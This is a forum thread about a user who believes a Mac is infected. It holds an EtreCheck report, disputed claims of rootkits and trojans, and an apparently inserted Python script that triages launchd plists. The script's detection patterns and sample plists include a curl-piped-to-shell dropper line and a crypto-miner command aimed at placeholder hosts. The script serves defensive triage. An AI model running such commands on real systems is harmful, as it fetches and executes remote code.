Posted 11 September 2023 - 09:16 PM
Posted 11 September 2023 - 10:21 PM
How did you get rid of your pesky crypto miner? Here are the logs from EtreCheck:
EtreCheckPro version: 6.8.1 (68024)
Report generated: 2023-09-11 22:11:11
Download EtreCheckPro from https://etrecheck.com
Runtime: 5:08
Performance: Below Average
Problem: Other problem
Description:
I ran rkhunter and spent days looking at all files and I'm positive I have a rootkit; it's modified my kernel modules.
Major Issues:
Anything that appears on this list needs immediate attention.
Heavy CPU usage - Some processes are using an unusually high amount of CPU.
Minor Issues:
These issues do not need immediate attention but they may indicate future problems or opportunities for improvement.
No Time Machine backup - Time Machine backup not found.
Runaway user process - A user process is using a large percentage of your CPU.
Low performance - EtreCheck report took an unusually long time to run.
Limited permissions - More information may be available with Full Disk Access.
Hardware Information:
MacBook Air (Retina, 13-inch, 2019)
Status: Supported
MacBook Air Model: MacBookAir8,2
1.6 GHz Dual-Core Intel Core i5 (i5-8210Y) CPU: 2-core
8 GB RAM - Not upgradeable
BANK 0/DIMM0 - 4 GB LPDDR3 2133
BANK 1/DIMM0 - 4 GB LPDDR3 2133
Battery: Health = Normal - Cycle count = 489
Video Information:
Intel UHD Graphics 617 - VRAM: 1536 MB
Color LCD (built-in) 2880 x 1800
Drives:
disk0 - APPLE SSD AP0128N 121.33 GB (Solid State - TRIM: Yes)
Internal PCI-Express 8.0 GT/s x4 NVM Express
disk0s1 - EFI [EFI] 315 MB
disk0s2 [APFS Container] 121.02 GB
disk1 [APFS Virtual drive] 121.02 GB (Shared by 6 volumes)
disk1s1 - A******** - Data (APFS) [APFS Virtual drive] (4.69 GB used)
disk1s2 - Preboot (APFS) [APFS Preboot] (1.86 GB used)
disk1s3 - Recovery (APFS) [Recovery] (1.15 GB used)
disk1s4 (APFS) [APFS Container] (9.17 GB used)
disk1s4s1 - A******D (APFS) [APFS Snapshot] (9.17 GB used)
disk1s5 - Update (APFS) (1 MB used)
disk1s6 - VM (APFS) [APFS VM] (20 KB used)
Mounted Volumes:
disk1s1 - A******** - Data [APFS Virtual drive]
Filesystem: APFS
Mount point: /System/Volumes/Data
Encrypted
Used: 4.69 GB
Shared values
Size: 121.02 GB
Free: 104.03 GB
disk1s2 - Preboot [APFS Preboot]
Filesystem: APFS
Mount point: /System/Volumes/Preboot
Used: 1.86 GB
Shared values
Size: 121.02 GB
Free: 104.03 GB
disk1s4s1 - A******D [APFS Snapshot]
Filesystem: APFS
Mount point: /
Read-only: Yes
Used: 9.17 GB
Shared values
Size: 121.02 GB
Free: 104.03 GB
disk1s5 - Update
Filesystem: APFS
Mount point: /System/Volumes/Update
Used: 1 MB
Shared values
Size: 121.02 GB
Free: 104.03 GB
disk1s6 - VM [APFS VM]
Filesystem: APFS
Mount point: /System/Volumes/VM
Used: 20 KB
Shared values
Size: 121.02 GB
Free: 104.03 GB
Network:
Interface en0: Wi-Fi
System Software:
macOS Ventura 13.5.2 (22G91)
Time since boot: Less than an hour
Security:
Gatekeeper: App Store and identified developers
System Integrity Protection: Enabled
Antivirus software: Apple
Applications:
406 apps
3 x86-only apps
2 unsigned apps
System Launch Daemons:
[Not Loaded] 37 Apple tasks
[Loaded] 197 Apple tasks
[Running] 152 Apple tasks
[Other] 2 Apple tasks
System Launch Agents:
[Not Loaded] 20 Apple tasks
[Loaded] 225 Apple tasks
[Running] 150 Apple tasks
App Extensions:
QuickLook Previews:
EtreCheckQuickLook - ~/Downloads/EtreCheckPro.app
com.etresoft.etrecheck4 *.etrecheck
Backup:
Time Machine Not Configured!
Performance:
System Load: 10.17 (1 min ago) 4.98 (5 min ago) 2.96 (15 min ago)
Nominal I/O usage: 4.44 MB/s
File system: 33.51 seconds
Write speed: 329 MB/s
Read speed: 1071 MB/s
CPU Usage Snapshot:
Type Overall
System: 21 %
User: 5 %
Idle: 74 %
Top Processes Snapshot by CPU:
Process (count) CPU (Source - Location)
find (2) 121.77 % (Apple)
tccd (2) 11.24 % (Apple)
WindowServer 10.08 % (Apple)
EtreCheckPro 6.66 % (Etresoft, Inc.)
trustd (4) 6.12 % (Apple)
Top Processes Snapshot by Memory:
Process (count) RAM usage (Source - Location)
EtreCheckPro 746 MB (Etresoft, Inc.)
kernel_task 313 MB (Apple)
com.apple.WebKit.WebContent (3) 266 MB (Apple)
AppleSpell 151 MB (Apple)
MTLCompilerService (7) 122 MB (Apple)
Top Processes Snapshot by Network Use:
Process Input / Output (Source - Location)
mDNSResponder 55 KB / 41 KB (Apple)
remoted 33 KB / 40 KB (Apple)
SubmitDiagInfo 67 KB / 949 B (Apple)
biometrickitd 28 KB / 24 KB (Apple)
corekdld 293 B / 28 KB (Apple)
Top Processes Snapshot by Energy Use:
Process (count) Energy (0-100) (Source - Location)
find (2) 35 (Apple)
WindowServer 2 (Apple)
Terminal 0 (Apple)
launchd 0 (Apple)
ContinuityCaptureAgent 0 (Apple)
Virtual Memory Information:
Physical RAM: 8 GB
Free RAM: 1.06 GB
Used RAM: 4.53 GB
Cached files: 2.41 GB
Available RAM: 3.47 GB
Swap Used: 0 B
Software Installs (past 60 days):
Install Date Name (Version)
2023-09-11 macOS 13.5.2 (13.5.2)
2023-09-11 Command Line Tools for Xcode (14.3)
Diagnostics Information (past 7-30 days):
2023-09-11 17:04:25 /Library/Logs/DiagnosticReports/ProxiedDevice-Bridge/recoverylogd-2023-09-11-170425.ips - Crash (2 times)
2023-09-11 16:42:07 /Library/Logs/DiagnosticReports/ProxiedDevice-Bridge/recoverylogd-2023-09-11-164207.ips - Crash (2 times)
2023-09-11 16:27:54 /Library/Logs/DiagnosticReports/ProxiedDevice-Bridge/recoverylogd-2023-09-11-162754.ips - Crash (2 times)
2023-09-11 16:10:59 /Library/Logs/DiagnosticReports/ProxiedDevice-Bridge/recoverylogd-2023-09-11-161059.ips - Crash (2 times)
2023-09-11 15:33:35 /Library/Logs/DiagnosticReports/ProxiedDevice-Bridge/recoverylogd-2023-09-11-153335.ips - Crash (2 times)
End of report
Posted 11 September 2023 - 10:32 PM
Again, what makes you think that there is an infection? You do realize that Parrot OS is created for hacking and hardening testing. https://www.guru99.com/best-os-hacking.html#:~:text=Parrot%20OS%20is%20a%20platform,%2C%20computer%20forensics%2C%20and%20more.
Posted 11 September 2023 - 10:51 PM
Yes I do!! And because of all the things that have been happening, not only on Parrot OS but, like I said, iOS PDF books I had uploaded to VirusTotal, and I saw a visual map of the networks it connected back to; one of them was highlighted red and said malicious. My macOS has the same problems: there are virtual disks that I never put there. I never started a server either. What more would you like!!? Or doesn't anyone know how to remove these things I stated? LKM trojan, the variant type A trojan, and an ADM worm is what's being reported from the tools.
Posted 12 September 2023 - 04:31 AM
US Navy Veteran from 2002 to 2006
Masters in Computer and Digital Forensics Expert - Stevenson University Alumni 2015
Arch Desktop - https://termbin.com/epij
Arch Laptop - https://www.termbin.com/dnwk
Ubuntu Server - https://termbin.com/zvra
Posted 13 September 2023 - 06:21 AM
Posted 13 September 2023 - 10:45 AM
Posted 13 September 2023 - 01:23 PM
Yes I do!! And because of all the things that have been happening, not only on Parrot OS but, like I said, iOS PDF books I had uploaded to VirusTotal, and I saw a visual map of the networks it connected back to; one of them was highlighted red and said malicious. My macOS has the same problems: there are virtual disks that I never put there. I never started a server either. What more would you like!!? Or doesn't anyone know how to remove these things I stated? LKM trojan, the variant type A trojan, and an ADM worm is what's being reported from the tools.
Of course you are going to get false flags that there is an infection with a distro directed at hacking and hardening.
Posted 16 September 2023 - 06:40 AM
This is my process list on my macOS Air, from launchctl print system.
Also I used the KnockKnock app to see processes and looked them up via VirusTotal. This is one of the many issues where I find some signs of things connected back to, or connections that are, malware.
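The check being done above by hand with launchctl print system and KnockKnock, as an added example (my code, not from the thread, EtreCheck, KnockKnock or Apple): read the launchd plists that third-party persistence lives in on macOS (/Library/LaunchDaemons, /Library/LaunchAgents, ~/Library/LaunchAgents), extract what each job actually executes, flag the things that matter when hunting a miner or dropper, and print the SHA-256 of the target so it can be looked up on VirusTotal. The trusted-prefix list, the heuristic patterns, and the three sample plists (labels com.example.backupagent, com.apple.systemupdated and com.example.helper, the pool host pool.invalid and the address 203.0.113.5) are constructed assumptions for illustration; a hit from any one heuristic is a reason to look closer, not proof of compromise.

```python
import hashlib
import os
import plistlib
import re
import tempfile
from pathlib import Path

# Third-party launchd jobs live here on macOS; Apple's own are under /System.
MACOS_DIRS = ["/Library/LaunchDaemons", "/Library/LaunchAgents",
              os.path.expanduser("~/Library/LaunchAgents")]
# Executables under these prefixes ship with macOS (assumed trusted for this triage).
TRUSTED_PREFIXES = ("/System/", "/usr/bin/", "/usr/sbin/", "/usr/libexec/",
                    "/bin/", "/sbin/", "/Library/Apple/")
# Command-line heuristics (assumptions, not proof): each hit is a reason to look closer.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"/(tmp|private/tmp|var/tmp|Users/Shared)/"), "binary in world-writable dir"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"), "download piped to shell"),
    (re.compile(r"\bbase64\b.*(-d|-D|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"xmrig|minerd|cpuminer|stratum\+tcp", re.I), "miner indicator"),
]


def launch_argv(plist):
    """What launchd execs for this job: ProgramArguments wins, else Program."""
    argv = plist.get("ProgramArguments") or ([plist["Program"]] if plist.get("Program") else [])
    return [str(a) for a in argv]


def file_sha256(path):
    """Hex SHA-256 of the job's target (what VirusTotal's search accepts); None if unreadable."""
    try:
        return hashlib.sha256(Path(path).read_bytes()).hexdigest()
    except OSError:  # missing target, or a path TCC will not let us read without Full Disk Access
        return None


def triage_plist(path):
    """Parse one launchd plist and return its label, argv, target hash and findings."""
    with open(path, "rb") as f:
        plist = plistlib.load(f)
    argv = launch_argv(plist)
    exe = argv[0] if argv else ""
    label = str(plist.get("Label", ""))
    findings = []
    if exe and not exe.startswith(TRUSTED_PREFIXES):
        findings.append("executable outside Apple system paths")
    findings += [why for pat, why in SUSPICIOUS_PATTERNS if pat.search(" ".join(argv))]
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        findings.append("RunAtLoad+KeepAlive (relaunches if killed)")
    if label.startswith("com.apple.") and not str(path).startswith("/System/"):
        findings.append("com.apple.* label outside /System (masquerading)")
    digest = file_sha256(exe) if exe else None
    return {"plist": str(path), "label": label, "argv": argv, "sha256": digest, "findings": findings}


def triage_dirs(dirs):
    """Triage every *.plist in the given directories; missing directories are skipped."""
    results = []
    for d in filter(os.path.isdir, dirs):
        for p in sorted(Path(d).glob("*.plist")):
            try:
                results.append(triage_plist(p))
            except Exception as exc:  # a plist launchd cannot parse is itself worth a look
                results.append({"plist": str(p), "label": "", "argv": [], "sha256": None,
                                "findings": [f"unreadable plist: {exc}"]})
    return results


def demo():
    """Three constructed plists (not from any real machine) written to a temp dir."""
    root = Path(tempfile.mkdtemp(prefix="launchd-triage-"))
    miner = root / "Users/Shared/.cache/xmrig"          # stand-in target, placeholder bytes
    miner.parent.mkdir(parents=True)
    miner.write_bytes(b"\xcf\xfa\xed\xfe" + b"\x00" * 32)
    samples = {
        "com.example.backupagent": {                    # benign: Apple binary, sane options
            "RunAtLoad": True, "StartInterval": 3600,
            "ProgramArguments": ["/usr/bin/rsync", "-a", "/Users/me/Documents", "/Volumes/Backup"]},
        "com.apple.systemupdated": {                    # miner wearing an Apple-looking label
            "RunAtLoad": True, "KeepAlive": True,
            "ProgramArguments": [str(miner), "-o", "stratum+tcp://pool.invalid:3333", "-k"]},
        "com.example.helper": {                         # dropper: trusted /bin/sh, hostile argv
            "RunAtLoad": True,
            "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL http://203.0.113.5/p.sh | sh"]},
    }
    for label, body in samples.items():
        with open(root / f"{label}.plist", "wb") as f:
            plistlib.dump(dict(body, Label=label), f)
    return triage_dirs([root])


if __name__ == "__main__":
    for r in triage_dirs(MACOS_DIRS) or demo():         # live dirs on a Mac, samples elsewhere
        print(("!! " if r["findings"] else "   ") + f"{r['label']:<28} "
              f"{(r['sha256'] or '-')[:16]}  {' '.join(r['argv'])}")
        for why in r["findings"]:
            print("      - " + why)
```

Run it with python3 on the Mac itself and it walks the live directories (give Terminal Full Disk Access first, or some targets hash as "-", which is the same "Limited permissions" caveat EtreCheck printed in the report above); anywhere else it falls back to the constructed samples. Anything it flags still needs to be confirmed, for example by checking the target's signature with codesign -dv --verbose=2 and pasting the SHA-256 into VirusTotal, before being removed.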
Posted 16 September 2023 - 02:59 PM
Yes I do!! And because of all the things that have been happening, not only on Parrot OS but, like I said, iOS PDF books I had uploaded to VirusTotal, and I saw a visual map of the networks it connected back to; one of them was highlighted red and said malicious. My macOS has the same problems: there are virtual disks that I never put there. I never started a server either. What more would you like!!? Or doesn't anyone know how to remove these things I stated? LKM trojan, the variant type A trojan, and an ADM worm is what's being reported from the tools.
Of course you are going to get false flags that there is an infection with a distro directed at hacking and hardening.
It's not just that system, it's spread through all my systems. I know what's happening, I'm not questioning that; "how" is my issue right now. Thank you.
Posted 16 September 2023 - 03:04 PM
This is my process list on my macOS Air, from launchctl print system.
https://dpaste.com/GBZGAYNCJ
Also I used the KnockKnock app to see processes and looked them up via VirusTotal. This is one of the many issues where I find some signs of things connected back to, or connections that are, malware.
https://www.virustotal.com/gui/file/0cb5352ac33727fd7979e454f6ac1a56b7795a8ab5a25d7cc955133fb47cf9c4/detection
Posted 16 September 2023 - 03:06 PM
Posted 17 September 2023 - 10:57 AM
Posted 17 September 2023 - 11:01 AM